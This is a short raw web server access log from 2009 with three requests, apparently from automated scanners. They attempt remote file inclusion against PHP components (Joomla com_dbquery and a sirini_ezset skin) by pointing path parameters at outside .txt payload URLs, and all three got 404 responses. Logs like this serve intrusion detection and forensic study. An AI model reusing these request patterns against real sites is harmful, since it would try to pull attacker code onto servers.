66.98.252.9 - - [13/Nov/2009:03:23:38 -0500] "GET /logs/access_log.Q109051700///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.teamspiritrealty.com/cypress/cas1.txt%20%20? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
66.98.252.9 - - [13/Nov/2009:03:23:38 -0500] "GET /logs/access_log.Q109060400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.teamspiritrealty.com/cypress/cas1.txt%20%20? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:23:38 -0500] "GET ///skin/sirini_ezset_fullpack/view.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
